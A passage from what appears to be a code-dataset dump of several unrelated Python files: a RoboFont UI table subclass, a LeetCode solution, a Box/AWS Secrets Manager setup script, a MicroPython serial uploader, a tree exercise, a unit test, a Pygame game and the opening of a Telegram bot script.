if editCallback is not None:\n self._editObserver._targetMethod = self._edit # circular reference to be killed in _breakCycles\n if items is not None:\n # wrap all the items\n items = [self._wrapItem(item) for item in items]\n items =AppKit.NSMutableArray.arrayWithArray_(items)\n # set up an array controller\n self._arrayController = self.nsArrayControllerClass.alloc().initWithContent_(items)\n self._arrayController.setSelectsInsertedObjects_(False)\n self._arrayController.setAvoidsEmptySelection_(not allowsEmptySelection)\n else:\n self._arrayController = dataSource\n self._tableView.setDataSource_(self._arrayController)\n # hide the header\n if not showColumnTitles or not columnDescriptions:\n self._tableView.setHeaderView_(None)\n self._tableView.setCornerView_(None)\n if headerHeight is not None:\n header = AppKit.NSTableHeaderView.alloc().initWithFrame_(AppKit.NSMakeRect(0,0,0, headerHeight))\n self._tableView.setHeaderView_(header)\n # set the table attributes\n self._tableView.setUsesAlternatingRowBackgroundColors_(False)\n #if not drawFocusRing:\n self._tableView.setFocusRingType_(NSFocusRingTypeNone)\n self._tableView.setRowHeight_(rowHeight+2)\n self._tableView.setAllowsEmptySelection_(allowsEmptySelection)\n self._tableView.setAllowsMultipleSelection_(allowsMultipleSelection)\n if drawVerticalLines or drawHorizontalLines:\n if drawVerticalLines and drawHorizontalLines:\n lineType =AppKit.NSTableViewSolidVerticalGridLineMask |AppKit.NSTableViewSolidHorizontalGridLineMask\n elif drawVerticalLines:\n lineType =AppKit.NSTableViewSolidVerticalGridLineMask\n else:\n lineType =AppKit.NSTableViewSolidHorizontalGridLineMask\n self._tableView.setGridStyleMask_(lineType)\n # set up the columns. also make a flag that will be used\n # when unwrapping items.\n self._orderedColumnIdentifiers = []\n self._typingSensitiveColumn = 0\n if not columnDescriptions:\n self._makeColumnWithoutColumnDescriptions()\n self._itemsWereDict = False\n else:\n self._makeColumnsWithColumnDescriptions(columnDescriptions, mainWindow, drawBorders, transparentBackground, font, widthIsHeader, headerHeight)\n self._itemsWereDict = True\n #### TEST\n self.columnDescriptions_DELETE = columnDescriptions\n # set some typing sensitivity data\n self._typingSensitive = enableTypingSensitivity\n if enableTypingSensitivity:\n self._lastInputTime = None\n self._typingInput = []\n # set up an observer that will be called by the bindings when the selection changes.\n # this needs to be done ater the items have been added to the table. otherwise,\n # the selection method will be called when the items are added to the table view.\n if selectionCallback is not None:\n self._selectionCallback = selectionCallback\n self._selectionObserver = self.nsArrayControllerObserverClass.alloc().init()\n self._arrayController.addObserver_forKeyPath_options_context_(self._selectionObserver, \"selectionIndexes\",AppKit.NSKeyValueObservingOptionNew, 0)\n self._selectionObserver._targetMethod = self._selection # circular reference to be killed in _breakCycles\n # set the double click callback the standard way\n if doubleClickCallback is not None:\n self._doubleClickTarget = VanillaCallbackWrapper(doubleClickCallback)\n self._tableView.setTarget_(self._doubleClickTarget)\n self._tableView.setDoubleAction_(\"action:\")\n # store the contextual menu callback\n self._menuCallback = menuCallback\n # set the drop data\n self._selfDropSettings = selfDropSettings\n self._selfWindowDropSettings = selfWindowDropSettings\n self._selfDocumentDropSettings = selfDocumentDropSettings\n self._selfApplicationDropSettings = selfApplicationDropSettings\n self._otherApplicationDropSettings = otherApplicationDropSettings\n allDropTypes = []\n for settings in (selfDropSettings, selfWindowDropSettings, selfDocumentDropSettings, selfApplicationDropSettings, otherApplicationDropSettings):\n if settings is None:\n continue\n dropType = settings[\"type\"]\n allDropTypes.append(dropType)\n self._tableView.registerForDraggedTypes_(allDropTypes)\n # set the default drop operation masks\n notLocal =AppKit.NSDragOperationNone\n if otherApplicationDropSettings is not None:\n notLocal = otherApplicationDropSettings.get(\"operation\",AppKit.NSDragOperationCopy)\n self._tableView.setDraggingSourceOperationMask_forLocal_(notLocal, False)\n local =AppKit.NSDragOperationNone\n for settings in (selfDropSettings, selfDocumentDropSettings, selfApplicationDropSettings):\n if settings is None:\n continue\n local = settings.get(\"operation\",AppKit.NSDragOperationCopy)\n self._tableView.setDraggingSourceOperationMask_forLocal_(local, True)\n\n if transparentBackground:\n self._tableView.setBackgroundColor_(NSColor.clearColor())\n #self._tableView.headerView().setBackgroundColor_(NSColor.clearColor())\n # deletingBorders\n if drawBorders is False:\n self._tableView.enclosingScrollView().setBorderType_(0)\n # set the drag data\n self._dragSettings = dragSettings\n\n # set up a delegate class\n\n self._delegate = self.delegateClass.alloc().initWithSelectionPremission_(allowSelection)\n self._tableView.setDelegate_(self._delegate)\n self._tableView.setIntercellSpacing_( AppKit.NSSize(0,0) )\n if not allowSelection:\n self.setSelection([])\n self.setCellHighlighting(self._highlightDescriptions)\n\n def getHighlightDescriptions(self):\n return self._highlightDescriptions\n \n def setCellHighlighting(self, highlightDescriptions):\n \"\"\"\n :param info: {(rowId,columnId)=(rgb||rgba)}\n :return: None\n \"\"\"\n self._highlightDescriptions = highlightDescriptions\n self._tableView.setTableCellHighlight_(highlightDescriptions)\n\n def _handleColumnWidths(self, columnDescriptions):\n # we also use this opportunity to determine if\n # autoresizing should be set for the table.\n autoResize = True\n for column in columnDescriptions:\n if column.get(\"width\") is not None:\n autoResize = False\n break\n if autoResize:\n self._setColumnAutoresizing()\n\n def _setColumnAutoresizing(self):\n # self._tableView.setColumnAutoresizingStyle_(AppKit.NSTableViewLastColumnOnlyAutoresizingStyle)\n self._tableView.setColumnAutoresizingStyle_(AppKit.NSTableViewUniformColumnAutoresizingStyle)\n\n def _makeColumnsWithColumnDescriptions(self, columnDescriptions, mainWindow, drawBorders, transparentBackground, font, widthIsHeader, headerHeight):\n # make sure that the column widths are in the correct format.\n self._handleColumnWidths(columnDescriptions)\n # create each column.\n tableAllowsSorting = self._allowsSorting\n tableWidth = 0\n for columnIndex, data in enumerate(columnDescriptions):\n\n title = data[\"title\"]\n image = data.get(\"image\")\n headerToolTip = data.get(\"headerToolTip\")\n key = data.get(\"key\", title)\n width = data.get(\"width\")\n minWidth = data.get(\"minWidth\", width)\n maxWidth = data.get(\"maxWidth\", width)\n formatter = data.get(\"formatter\")\n cell = data.get(\"cell\")\n editable = data.get(\"editable\")\n allowsSorting = data.get(\"allowsSorting\", True)\n binding = data.get(\"binding\", \"value\")\n font = data.get(\"font\")\n textColor = data.get(\"textColor\")\n alignment = data.get(\"alignment\")\n truncateFromStart = data.get(\"truncateFromStart\")\n keyPath = \"arrangedObjects.%s\" % key\n if font is not None:\n if isinstance(font, tuple):\n font =AppKit.NSFont.fontWithName_size_(*font)\n # check for typing sensitivity.\n if data.get(\"typingSensitive\"):\n self._typingSensitiveColumn = columnIndex\n # instantiate the column.\n column =AppKit.NSTableColumn.alloc().initWithIdentifier_(key)\n # # #####TEST\n if transparentBackground:\n myHeaderCell = TransparentNSTableHeaderCell.alloc().init()\n column.setHeaderCell_(myHeaderCell)\n if headerHeight is not None and transparentBackground is False:\n # print('ResizedNSTableHeaderCell 1')\n myHeaderCell = ResizedNSTableHeaderCell.alloc().init()\n # print('ResizedNSTableHeaderCell 2')\n column.setHeaderCell_(myHeaderCell)\n # print('ResizedNSTableHeaderCell 3')\n # # #####TEST\n self._orderedColumnIdentifiers.append(key)\n # set the width resizing mask\n if width is not None:\n if width == minWidth and width == maxWidth:\n mask =AppKit.NSTableColumnNoResizing\n else:\n mask =AppKit.NSTableColumnUserResizingMask |AppKit.NSTableColumnAutoresizingMask\n else:\n mask =AppKit.NSTableColumnUserResizingMask |AppKit.NSTableColumnAutoresizingMask\n column.setResizingMask_(mask)\n # set the header cell\n\n column.headerCell().setTitle_(title)\n # setting custom font\n \n\n if font is not None and self._tableView.headerView() is not None:\n column.headerCell().setFont_(font)\n if truncateFromStart is not None and self._tableView.headerView() is not None:\n if truncateFromStart:\n if isinstance(column.headerCell(), AppKit.NSTextFieldCell):\n column.headerCell().setLineBreakMode_(3)\n\n if transparentBackground:\n column.headerCell().setDrawsBackground_(False)\n column.headerCell().setBackgroundColor_(NSColor.clearColor())\n # set the data cell\n if cell is None:\n cell = column.dataCell()\n cell.setDrawsBackground_(False)\n cell.setStringValue_(\"\") # cells have weird default values\n if truncateFromStart is not None:\n if truncateFromStart:\n if isinstance(cell, AppKit.NSTextFieldCell):\n cell.setLineBreakMode_(3)\n else:\n column.setDataCell_(cell)\n # setting custom font\n if font is not None:\n cell.setFont_(font)\n\n if alignment is not None:\n cell.setAlignment_(_textAlignmentMap[alignment])\n\n # assign the formatter\n if formatter is not None:\n cell.setFormatter_(formatter)\n if self._arrayController is not None:\n bindingOptions = None\n if not tableAllowsSorting or not allowsSorting:\n bindingOptions = {NSCreatesSortDescriptorBindingOption : False}\n # assign the key to the binding\n column.bind_toObject_withKeyPath_options_(binding, self._arrayController, keyPath, bindingOptions)\n\n # set the editability of the column.\n # if no value was defined in the column data,\n # base the editability on the presence of\n # an edit callback.\n if editable is None and self._editCallback is None:\n editable = False\n elif editable is None and self._editCallback is not None:\n editable = True\n if editable:\n if self._arrayController is not None:\n self._arrayController.addObserver_forKeyPath_options_context_(self._editObserver, keyPath,AppKit.NSKeyValueObservingOptionNew, 0)\n else:\n column.setEditable_(False)\n # finally, add the column to the table view\n self._tableView.addTableColumn_(column)\n\n # applying textColor\n if textColor is not None:\n if isinstance(textColor,tuple):\n color =AppKit.NSColor.colorWithCalibratedRed_green_blue_alpha_(*textColor)\n else:\n color = textColor\n cell.setTextColor_(color)\n\n if transparentBackground:\n column.headerCell().setBackgroundColor_(NSColor.clearColor())\n if widthIsHeader:\n width = column.headerCell().attributedStringValue().size().width\n column.setWidth_(width+10)\n column.setMinWidth_(width+10)\n column.setMaxWidth_(width+10)\n tableWidth += width+14\n else:\n if width is not None:\n # do this *after* adding the column to the table, or the first column\n # will have the wrong width (at least on 10.3)\n column.setWidth_(width)\n column.setMinWidth_(minWidth)\n column.setMaxWidth_(maxWidth)\n # print(f'column {columnIndex}', data)\n if image is not None:\n # print(image)\n column.headerCell().setImage_(image)\n if headerToolTip is None:\n column.setHeaderToolTip_(title)\n if headerToolTip is not None:\n column.setHeaderToolTip_(headerToolTip)\n\n # force the columns to adjust their widths if possible. (needed in 10.10)\n if mainWindow is not None:\n x,y,w,h = mainWindow.window().getPosSize()\n\n if tableWidth+210+18 < w-25:\n x,y,w,h = self.getPosSize()\n self.setPosSize((x,y,tableWidth,h))\n self._tableView.sizeToFit()\n self.tableWidth = tableWidth\n\ndef MTTextBox(posSize, text=\"\", alignment=\"natural\", selectable=False, sizeStyle=\"regular\", fontAttr=None, color=None):\n txtBox = TextBox(posSize, text, alignment, selectable, sizeStyle)\n if fontAttr is not None:\n if isinstance(fontAttr, tuple):\n fontAttr =AppKit.NSFont.fontWithName_size_(*fontAttr)\n txtBox.getNSTextField().setFont_(fontAttr)\n if color is not None:\n if isinstance(color, tuple):\n color =AppKit.NSColor.colorWithCalibratedRed_green_blue_alpha_(*color)\n txtBox.getNSTextField().setTextColor_(color)\n\n return txtBox\n\ndef MTButton(posSize, title, callback=None, sizeStyle=\"mini\"):\n button = Button(posSize, title, callback=callback, sizeStyle=sizeStyle)\n nsObj = button.getNSButton()\n nsObj.setBezelStyle_(AppKit.NSRoundRectBezelStyle)\n return button\n\nclass MTDesignSpaceLoadingProblem:\n def __init__(self, path, parentController, foundDSEditor, DSProblemChecker):\n self.parentController = parentController\n txtH = 17\n x,y,p = (10,10,10)\n loadingissue = MTFloatingWindowWrapper((550, 300),minSize=(440, 300))\n loadingissue.title = TextBox((x,y,-p,txtH*6),'Error loading design space file.\\n\\n\\nMaster-tool faced following design space problems,\\nwhile loading the design space file (some of them are critical):')\n y += txtH*6 + p\n _categories = DesignSpaceProblem._categories\n _problems = DesignSpaceProblem._problems\n # problems = [dict(category=_categories[problem.category],problem=_problems[(problem.category,problem.problem)],data=problem.data) for problem in DSProblemChecker.problems]\n problems = []\n for problem in DSProblemChecker.problems:\n _category = _categories[problem.category]\n _problem = _problems[(problem.category,problem.problem)]\n if problem.data is not None:\n _data = [ f'{key}: {problem.data[key]}' for key in problem.data ]\n else: _data = ''\n problems += [\n dict(\n category=_category,\n problem=_problem,\n data='; '.join(_data),\n )\n ]\n\n columnDescriptions=[{\"title\": \"category\",\"font\":AppKit.NSFont.systemFontOfSize_(10),'minWidth':70,\"width\":70,\"textColor\":((1,0,0,1)), 'cell':MTVerticallyCenteredTextFieldCell.alloc().init()}, \n {\"title\": \"problem\",\"font\":(\"Monaco\",10),\"alignment\":\"left\",'truncateFromStart':True, 'cell':MTVerticallyCenteredTextFieldCell.alloc().init(),'maxWidth':215,'minWidth':215,'width':215},\n {\"title\": \"data\",\"font\":(\"Monaco\",10),\"alignment\":\"left\",'truncateFromStart':True, 'cell':MTVerticallyCenteredTextFieldCell.alloc().init(),'minWidth':45},\n ]\n\n\n\n loadingissue.list = MTList(\n (p,y,-p,-txtH-2*p),\n problems, rowHeight=30,\n transparentBackground=True,\n allowsMultipleSelection=False,\n columnDescriptions=columnDescriptions)\n # loadingissue.list.getNSTableView().setSelectionHighlightStyle_(4)\n lineType =AppKit.NSTableViewSolidHorizontalGridLineMask\n loadingissue.list.getNSTableView().setGridStyleMask_(lineType)\n\n loadingissue.cancelBtn = MTButton((x, -txtH-p,200,txtH), 'cancel', callback=self._closeIssueWarning)\n loadingissue.cancelBtn.parent = loadingissue\n if foundDSEditor:\n loadingissue.openDesignSpaceEditorBtn = MTButton((x+200+p, -txtH-p,200,txtH), 'open in design space editor', callback=self._openDSEditor)\n loadingissue.openDesignSpaceEditorBtn.parent = loadingissue\n loadingissue.openDesignSpaceEditorBtn.path = path\n loadingissue.openDesignSpaceEditorBtn.enable(foundDSEditor)\n loadingissue.open()\n\n def _closeIssueWarning(self, btn):\n btn.parent.close()\n\n def _openDSEditor(self, btn):\n self.parentController.openDesignSpaceEditorCallback(btn)\n btn.parent.close()\n\nif __name__ == '__main__':\n print('main')","repo_name":"RafalBuchner/masterTools","sub_path":"master-tools.roboFontExt/lib/masterTools/UI/vanillaSubClasses.py","file_name":"vanillaSubClasses.py","file_ext":"py","file_size_in_byte":44318,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"63"} +{"seq_id":"28241472287","text":"from leetcode_alg import *\n\n\nclass Solution:\n \"\"\"类背包\"\"\"\n def change(self, amount: int, coins: List[int]) -> int:\n dp = [0] * (amount + 1)\n dp[0] = 1\n for c in coins:\n for capa in range(c, amount+1):\n dp[capa] += dp[capa-c]\n return dp[amount]\n\n\nif __name__ == \"__main__\":\n amount = 5\n coins = [1, 2, 5]\n assert Solution().change(5, coins) == 4\n","repo_name":"Jintao-Huang/LeetCode-Py","sub_path":"answer/0518.py","file_name":"0518.py","file_ext":"py","file_size_in_byte":418,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"63"} +{"seq_id":"16288454760","text":"#!/usr/bin/env python3\nimport boto3\nimport argparse\nimport json\nfrom pathlib import Path\nfrom boxsdk import JWTAuth\n\n\ndef parse_args():\n parser = argparse.ArgumentParser(\n \"create_secret.py\", description=\"create a Secrets Manager secret for use with notebook-data-redirector\"\n )\n parser.add_argument(\"--secret-name\", help=\"the name of the Secrets Manager secret to create\", required=True)\n parser.add_argument(\"--box-client-id\", help=\"your Box client ID\", required=True)\n parser.add_argument(\"--box-client-secret\", help=\"your Box client secret\", required=True)\n parser.add_argument(\"--box-enterprise-id\", help=\"your Box enterprise ID\", required=True)\n parser.add_argument(\"--box-jwt-key-id\", help=\"your Box JWT key ID\", required=True)\n parser.add_argument(\n \"--box-rsa-private-key-path\", help=\"path to a file containing your Box RSA private key\", required=True\n )\n parser.add_argument(\"--box-rsa-private-key-passphrase\", help=\"your Box RSA private key passphrase\", required=True)\n parser.add_argument(\"--box-webhook-signature-key\", help=\"your Box webhook signature key\", required=True)\n parser.add_argument(\n \"--tags\", nargs=\"+\", type=str, default=[], help=\"space separated list of key value tag pairs\", required=False\n )\n parser.add_argument(\"--force\", help=\"overwrite an existing Secrets Manager secret\", action=\"store_true\")\n return parser.parse_args()\n\n\ndef check_box_auth(secret):\n try:\n JWTAuth(\n client_id=secret[\"box_client_id\"],\n client_secret=secret[\"box_client_secret\"],\n enterprise_id=secret[\"box_enterprise_id\"],\n jwt_key_id=secret[\"box_jwt_key_id\"],\n rsa_private_key_data=secret[\"box_rsa_private_key_data\"],\n rsa_private_key_passphrase=secret[\"box_rsa_private_key_passphrase\"],\n ).authenticate_instance()\n except Exception as e:\n raise RuntimeError(\"Box failed to authenticate, check credentials and try again\") from e\n\n\ndef create_secret(secret_name, secret, tags=[], force=False):\n serialized_secret = json.dumps(secret)\n\n client = boto3.client(\"secretsmanager\")\n\n try:\n arn = client.describe_secret(SecretId=secret_name)[\"ARN\"]\n # on the STSci control tower account, a generic ClientError is raised if the resource doesn't exist.\n # this is likely due to describe secret only being allowed on your own tagged secrets\n except (client.exceptions.ResourceNotFoundException, client.exceptions.ClientError):\n arn = client.create_secret(\n Name=secret_name,\n Description=\"Credentials for notebook-data-redirector\",\n SecretString=serialized_secret,\n Tags=tags,\n )[\"ARN\"]\n else:\n if force:\n client.put_secret_value(SecretId=arn, SecretString=serialized_secret)\n client.tag_resource(SecretId=arn, Tags=tags)\n else:\n raise RuntimeError(\"A secret already exists with the specified name, use --force to overwrite it\")\n\n return arn\n\n\nargs = parse_args()\n\nsecret = {}\nsecret[\"box_client_id\"] = args.box_client_id\nsecret[\"box_client_secret\"] = args.box_client_secret\nsecret[\"box_enterprise_id\"] = args.box_enterprise_id\nsecret[\"box_jwt_key_id\"] = args.box_jwt_key_id\nsecret[\"box_rsa_private_key_passphrase\"] = args.box_rsa_private_key_passphrase\nsecret[\"box_webhook_signature_key\"] = args.box_webhook_signature_key\nwith Path(args.box_rsa_private_key_path).open() as file:\n secret[\"box_rsa_private_key_data\"] = file.read().replace(\"\\\\n\", \"\\n\")\n\ncheck_box_auth(secret)\n\nif (len(args.tags) >= 2) and (len(args.tags) % 2 == 0):\n tags = [{\"Key\": k, \"Value\": v} for k, v in zip(args.tags[0::2], args.tags[1::2])]\nelif len(args.tags) > 0:\n raise ValueError(\n \"tags argument must be a space-separated list of key value pairs, and therefore should have an even number of entries\"\n )\nelse:\n tags = []\n\narn = create_secret(args.secret_name, secret, tags=tags, force=args.force)\n\nprint(f\"Created Secrets Manager secret with ARN: {arn}\")\n","repo_name":"spacetelescope/notebook-data-redirector","sub_path":"scripts/create_secret.py","file_name":"create_secret.py","file_ext":"py","file_size_in_byte":4043,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"63"} +{"seq_id":"18770030716","text":"#! /usr/bin/env python\n\nimport serial\nimport sys\nimport time\n\nif len(sys.argv) != 2:\n sys.stderr.write('USAGE: %s \\n' % sys.argv[0])\n sys.exit(1)\n\ndata = open(sys.argv[1], 'rb').read()\n\nser = serial.Serial('/dev/tty.SLAB_USBtoUART', 115200, timeout=1)\nser.write('\\x01import os;import sys;')\nser.write('data=sys.stdin.read(%d)\\n\\x04' % len(data))\nser.write(data)\nser.write('with open(\"%s\", \"wb\") as fh:\\n fh.write(data)\\n\\x04' % sys.argv[1])\nser.write('\\x02')\nser.write('os.listdir()\\r\\n')\n","repo_name":"flagxor/wbgame","sub_path":"upload.py","file_name":"upload.py","file_ext":"py","file_size_in_byte":502,"program_lang":"python","lang":"uk","doc_type":"code","stars":1,"dataset":"github-code","pt":"63"} +{"seq_id":"40674918597","text":"class NodoArvore:\n def __init__(self, chave = None, esq = None, dir = None):\n self.chave = chave\n self.esq = esq\n self.dir = dir\n\n def __str__(self):\n return '%s' %(self.chave) \n\ndef inserirABB(raiz, nodo):\n if raiz is None:\n raiz = nodo\n\n # Verificar o caso base para esq e dir None\n elif nodo.chave > raiz.chave: #Valor vai p/ direita pq é maior que a raiz\n if raiz.dir is None:\n raiz.dir = nodo # Valor \n print(raiz)\n else:\n inserirABB(raiz.dir, nodo)\n\n else: \n if raiz.esq is None:\n raiz.esq = nodo\n else:\n inserirABB(raiz.esq, nodo)\n\ndef nivel(raiz, n):\n nodo = raiz\n altEsq = -1\n altDir = -1\n print(nodo.esq)\n print(nodo.dir)\n if nodo.esq:\n print(nodo.esq)\n if nodo.esq == n:\n return altEsq + 1 \n else:\n altEsq = nivel(nodo.esq, n)\n return altDir + 1 \n if nodo.dir:\n print(nodo.dir)\n if nodo.dir == n:\n return altDir + 1 \n else:\n altDir = nivel(nodo.dir, n)\n return altDir + 1 \n return altDir + 1 \n\nraiz = NodoArvore(40)\nfor i in [10, 60, 50, 70, 30, 20]:\n inserirABB(raiz, NodoArvore(i))\n\nprint(nivel(raiz, 60))\n\n ","repo_name":"danilosrocha/estrutura-de-dados","sub_path":"Exercícios/Lista 6/Ex 1.py","file_name":"Ex 1.py","file_ext":"py","file_size_in_byte":1261,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"63"} +{"seq_id":"70742289801","text":"import os\nos.environ[\"WHERE\"] = \"API_TEST\"\nimport unittest\nfrom datanator_query_python.config import config as query_config\nfrom datanator_query_python.query_schema_2 import query_taxon_tree_v2\nimport asyncio\nfrom pprint import pprint\n\n\n\nclass TestQTaxon(unittest.TestCase):\n\n @classmethod\n def setUpClass(cls):\n print(os.getenv(\"WHERE\"))\n cls.src = query_taxon_tree_v2.QTaxon()\n\n @classmethod\n def tearDownClass(cls):\n os.environ[\"WHERE\"] = \"\"\n\n def test_get_canon_ancestor(self):\n _id = 1915648\n loop = asyncio.get_event_loop()\n ids, _ = loop.run_until_complete(self.src.get_canon_ancestor(_id, _format='tax_id')) \n self.assertTrue(2283796 not in ids)\n self.assertTrue(2157 in ids)\n _id = \"nonsense\"\n loop = asyncio.get_event_loop()\n ids, _ = loop.run_until_complete(self.src.get_canon_ancestor(_id, _format='tax_name')) \n self.assertEqual([], ids)\n\n # @unittest.skip(\"for now\")\n def test_aggregate_distance(self):\n measured_0 = [{\"canon_anc_ids\": [131567, 2, 1224, 1236, 91347, 543, 590, 28901],\n \"tax_name\": \"Salmonella enterica subsp. enterica serovar Newport str. CFSAN000907\"}] #tax_id1299189\n target_0 = 0\n target_1 = 1227178\n loop = asyncio.get_event_loop()\n result_0 = loop.run_until_complete(self.src.aggregate_distance(measured_0, target_0, name_field='tax_name'))\n self.assertEqual(result_0, measured_0)\n result_1 = loop.run_until_complete(self.src.aggregate_distance(measured_0, target_1, name_field='tax_name'))\n self.assertEqual(result_1[0]['taxon_distance']['Salmonella enterica subsp. enterica serovar Newport str. CFSAN001557'], 0)\n # taget is measured's ancestor\n measured_1 = [{\"canon_anc_ids\": [131567, 2759, 4751, 4890, 4891, 4892, 4893, 4930, 4932],\n \"tax_name\": \"Saccharomyces cerevisiae CAT-1\"}]\n target_2 = 4932 # Saccharomyces cerevisiae\n result_2 = loop.run_until_complete(self.src.aggregate_distance(measured_1, target_2, name_field='tax_name'))\n self.assertEqual(result_2[0]['taxon_distance']['Saccharomyces cerevisiae'], 0)\n self.assertEqual(result_2[0]['taxon_distance']['Saccharomyces cerevisiae CAT-1'], 1)","repo_name":"KarrLab/datanator_query_python","sub_path":"tests/query_schema_2/test_query_taxon_tree_v2.py","file_name":"test_query_taxon_tree_v2.py","file_ext":"py","file_size_in_byte":2298,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"63"} +{"seq_id":"14143833346","text":"import pygame\nimport random\n\n# Inicializace hry\npygame.init()\n\n# obrazovka\nwidth = 1000\nheight = 500\nscreen = pygame.display.set_mode((width, height))\npygame.display.set_caption(\"Tom and Jerry GAME\")\n\n# Nastavení hry\nplayer_start_lives = 5 # měníme v průbehu hry\nplayer_speed = 5 # neměníme\nmouse_speed = 5 # měníme\nmouse_speed_acceleration = 0.5 # neměníme\nmouse_behind_border = 100 #neměníme\nscore = 0 # měníme\ncoin_speed = 50\n\nplayer_lives = player_start_lives # měníme\nmouse_curent_speed = mouse_speed\n\n#FPS a hodiny\nfps = 60\nclock = pygame.time.Clock()\n\n# barvy\ndark_yellow = pygame.Color(\"#938f0c\")\nblack = (0,0,0)\nwhite = (255, 255, 255)\nred = (255, 0, 0)\ngreen = ( 0, 255, 0)\nblue = (0, 0, 255)\n\n# fonty\ngame_font_big = pygame.font.Font(\"fonts/mujfont.ttf\", 50)\ngame_font_middle = pygame.font.Font(\"fonts/mujfont.ttf\", 35)\n\n\n# text\ngame_name = game_font_big.render(\"Tom and Jerry Game\", True, dark_yellow)\ngame_name_rect = game_name.get_rect()\ngame_name_rect.center = (width//2, 30)\n\ngame_over_text = game_font_big.render(\"Hra skoncila.\", True, dark_yellow)\ngame_over_text_rect = game_over_text.get_rect()\ngame_over_text_rect.center = (width//2, height//2)\n\ncontinue_text = game_font_middle.render(\"Chces hrat znovu? Stiskni libovolnou klavesu\", True, dark_yellow)\ncontinue_text_rect = continue_text.get_rect()\ncontinue_text_rect.center = (width//2, height//2 + 40)\n\nvictory_text = game_font_middle.render(\"Vyhrali jste. Ziskali jste zlatou minci\", True, dark_yellow)\nvictory_text_rect = victory_text.get_rect()\nvictory_text_rect.center = (width//2, height//2)\n\n# zvuky a hudba v pozadí, -1 nekonečno\npygame.mixer.music.load(\"music/bgmusic.wav\")\npygame.mixer.music.play(-1, 0.0)\nloose_life_sound = pygame.mixer.Sound(\"music/boom.wav\")\n#loose_life_sound.set_volume(0.1)\ncatch_mouse_sound = pygame.mixer.Sound(\"music/zap.wav\")\n#catch_mouse_sound.set_volume(0.1)\n\n\n# obrázky\ncat_image = pygame.image.load(\"img/cat-icon.png\")\ncat_image_rect = cat_image.get_rect()\ncat_image_rect.center = (60, height//2)\n\nmouse_image = pygame.image.load(\"img/mouse.png\")\nmouse_image_rect = mouse_image.get_rect()\nmouse_image_rect.x = width + mouse_behind_border # left\nmouse_image_rect.y = random.randint(60, height-48) # top\n\ncoin_image = pygame.image.load(\"img/coin-icon.png\")\ncoin_image_rect = coin_image.get_rect()\ncoin_image_rect.centerx = width - 100 # left\ncoin_image_rect.centery = 60\n\n\n# Hlavní cyklus\nlets_continue = True\n\nwhile lets_continue:\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n lets_continue = False\n\n # pohyb klavesami\n keys = pygame.key.get_pressed()\n if keys[pygame.K_UP] and cat_image_rect.top > 60:\n cat_image_rect.y -= player_speed\n elif keys[pygame.K_DOWN] and cat_image_rect.bottom < height:\n cat_image_rect.y += player_speed\n\n # pohyb mouse\n if mouse_image_rect.x < 0:\n player_lives -= 1\n mouse_image_rect.x = width + mouse_behind_border\n mouse_image_rect.y = random.randint(60, height - 48)\n loose_life_sound.play()\n else:\n mouse_image_rect.x -= mouse_curent_speed\n\n # kontrola pozice mince\n if coin_image_rect.left <= 0:\n screen.blit(victory_text, victory_text_rect)\n screen.blit(continue_text, continue_text_rect)\n pygame.display.update()\n pygame.mixer.music.stop()\n coin_image_rect.left = width - 100\n\n pause = True\n while pause:\n for event in pygame.event.get():\n if event.type == pygame.KEYDOWN:\n score = 0\n player_lives = player_start_lives\n mouse_curent_speed = mouse_speed\n cat_image_rect.y = height // 2\n pause = False\n pygame.mixer.music.play(-1, 0.0)\n elif event.type == pygame.QUIT:\n pause = False\n lets_continue = False\n\n\n # kontrola kolize\n if cat_image_rect.colliderect(mouse_image_rect):\n score += 1\n mouse_curent_speed += mouse_speed_acceleration\n mouse_image_rect.x = width + mouse_behind_border\n mouse_image_rect.y = random.randint(60, height - 48)\n catch_mouse_sound.play()\n coin_image_rect.centerx -= coin_speed\n\n # znovu vykresleni obrazovky\n screen.fill(black)\n\n # tvary\n pygame.draw.line(screen, dark_yellow, (0, 60), (width, 60), 2)\n\n # Nastavení textů\n lives_text = game_font_middle.render(f\"Lives: {player_lives}\", True, dark_yellow)\n lives_text_rect = lives_text.get_rect()\n lives_text_rect.right = width - 20\n lives_text_rect.top = 15\n\n score_text = game_font_middle.render(f\"Skore: {score}\", True, dark_yellow)\n score_text_rect = score_text.get_rect()\n score_text_rect.left = 20\n score_text_rect.top = 15\n\n # texty, zobrazení\n screen.blit(game_name, game_name_rect)\n screen.blit(score_text, score_text_rect)\n screen.blit(lives_text, lives_text_rect)\n\n # obrazky\n screen.blit(cat_image, cat_image_rect)\n screen.blit(mouse_image, mouse_image_rect)\n screen.blit(coin_image, coin_image_rect)\n\n # kontrola konce hry, UPDATE !!!!!\n if player_lives == 0:\n screen.blit(game_over_text, game_over_text_rect)\n screen.blit(continue_text, continue_text_rect)\n pygame.display.update()\n pygame.mixer.music.stop()\n\n pause = True\n while pause:\n for event in pygame.event.get():\n if event.type == pygame.KEYDOWN:\n score = 0\n player_lives = player_start_lives\n mouse_curent_speed = mouse_speed\n cat_image_rect.y = height//2\n pause = False\n pygame.mixer.music.play(-1, 0.0)\n coin_image_rect.left = width - 100\n elif event.type == pygame.QUIT:\n pause = False\n lets_continue = False\n\n\n\n\n #update\n pygame.display.update()\n\n # zpomalení cyklu - tikání hodin\n clock.tick(fps)\n\n\n\n\n\n\n\n\n# ukončení hry\npygame.quit()","repo_name":"KerstynU/Pygame---cat-and-mouse","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":6114,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"63"} +{"seq_id":"1701483690","text":"\"\"\"\nпример работы бота телеграмм\n\nс conversation (диалога)\nчтобы войти в диалог нужно ввести команду /AddUser\n\n\"\"\"\n\nimport os\nfrom dotenv import load_dotenv # pip3 install python-dotenv\nfrom telethon import TelegramClient, events, connection # pip3 install Telethon\n\ndotenv_path = os.path.join(os.path.dirname(__file__), \".env\")\nprint((dotenv_path))\nif os.path.exists(dotenv_path):\n load_dotenv(dotenv_path)\napp_api_id = os.getenv(\"TLG_APP_API_ID\")\napp_api_hash = os.getenv(\"TLG_APP_API_HASH\")\napp_name = os.getenv(\"TLG_APP_NAME\")\nbot_token = os.getenv(\"I_BOT_TOKEN\")\nclient = 